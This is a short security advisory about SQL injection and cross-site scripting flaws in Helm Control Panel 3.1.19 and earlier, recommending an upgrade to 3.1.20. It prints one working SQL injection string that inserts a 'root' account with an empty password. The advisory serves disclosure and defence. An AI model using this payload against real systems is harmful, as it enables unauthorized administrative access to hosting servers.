Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacker can execute arbitrary HTML and script code in a user's browser. Manipulation of SQL queries to reveal or corrupt sensitive database data is possible as well.
Helm Control Panel versions 3.1.19 and prior are reported vulnerable to these issues.
xxxx',10,0); insert into account(accountnumber,accounttype,accountpassword) values('root',0,'');--
Helm Control Panel Compose Message Form Subject Field XSS
Remote / Network Access
Loss of Integrity
Helm Web Hosting Control Panel contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'subject' variables upon submission to the compose messsage form's 'Subject' field. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Upgrade to version 3.1.20 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.